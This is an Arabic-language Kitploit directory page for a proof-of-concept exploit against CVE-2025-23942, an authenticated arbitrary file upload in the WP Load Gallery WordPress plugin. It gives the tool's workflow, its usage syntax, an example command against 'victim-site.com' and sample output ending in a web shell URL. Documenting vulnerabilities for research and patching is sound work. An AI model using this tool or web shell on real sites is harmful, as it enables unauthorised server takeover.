Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-23942-poc — WP Load Gallery <= 2.1.6 - رفع ملفات تعسفي للمستخدمين المُصادَقين (مؤلف+) | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-23942-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2025-23942-poc

CVE-2025-23942-poc

WP Load Gallery <= 2.1.6 - رفع ملفات تعسفي للمستخدمين المُصادَقين (مؤلف+)

عرض المستودع
32منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال WP Load Gallery (CVE-2025-23942)

📌 الوصف

ثغرة رفع غير مقيد لملف بنوع خطير (Unrestricted Upload of File with Dangerous Type) في WP Load Gallery من NgocCode تسمح برفع Web Shell إلى خادم الويب. تؤثر هذه المشكلة على WP Load Gallery: من n/a حتى 2.1.6.

⚠️ تفاصيل الثغرة

  • معرف CVE: CVE-2025-23942
  • الإضافة المتأثرة: WP Load Gallery
  • الإصدارات المتأثرة: حتى 2.1.6
  • نوع الثغرة: رفع ملفات غير مقيد
  • الخطورة: حرجة (9.1 CVSS)
  • متجه الهجوم: تنفيذ تعليمات برمجية عن بُعد (RCE) لمستخدم موثَّق (Author+)
  • يتوفر تصحيح: ❌ (لا يوجد تصحيح رسمي بعد)

🚀 ميزات أداة الاستغلال

✅ استغلال آلي – يستخرج nonce، ويسجّل الدخول، ويرفع Web Shell تلقائيًا.
✅ فحص الإصدار – يتأكد مما إذا كان الهدف عرضةً للثغرة قبل الاستغلال.
✅ معالجة الأخطاء – يضمن تنفيذًا سلسًا حتى في حالة حدوث فشل.
✅ إدارة الجلسات – يستخدم إدارة جلسات دائمة للمصادقة.
✅ تغذية راجعة فورية – يوفر مخرجات في كل خطوة.

🛠️ المتطلبات

  • Python 3.x
  • وحدة requests (pip install requests)
  • حساب صالح بصلاحية مؤلف (Author+) في WordPress على النظام المستهدف

🔥 طريقة الاستخدام

شغّل السكربت بالمعاملات اللازمة:

root@kitploit:~
usage: CVE-2025-23942.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit WP Load Gallery - Arbitrary File Upload

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., https://example.com)
  -un USERNAME, --username USERNAME
                        WordPress Username
  -p PASSWORD, --password PASSWORD
                        WordPress Password

مثال:

root@kitploit:~
python CVE-2025-23942.py -u http://victim-site.com -un author_user -p password123

📝 مثال على المخرجات

root@kitploit:~
   _______      ________    ___   ___ ___  _____     ___  ____   ___  _  _ ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|   |__ \|___ \ / _ \| || |__ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ ) | __) | (_) | || |_ ) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______/ / |__ < \__, |__   _/ / 
 | |____   \  /  | |____    / /_| |_| / /_ ___) |    / /_ ___) |  / /   | |/ /_ 
  \_____|   \/   |______|  |____|\___/____|____/    |____|____/  /_/    |_|____|

[+] Checking plugin version...
[+] Detected version: 2.1.6
[+] The target is vulnerable! Proceeding with exploitation...
[+] Logged in successfully.
[+] Extracting wplg_nonce...
[+] Extracted wplg_nonce: a1b2c3d4e5
[+] Uploading shell...
[+] File uploaded successfully!
[+] Shell is accessible at: http://victim-site.com/wp-content/uploads/2025/02/nxploit.php?cmd=id

📜 إخلاء مسؤولية قانوني

أداة الاستغلال هذه مخصصة لأغراض تعليمية وبحوث أمنية فقط. لا تستخدمها على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. المؤلف غير مسؤول عن أي إساءة استخدام لهذا السكربت. ( Khaled_alenazi )

تنزيل الأداة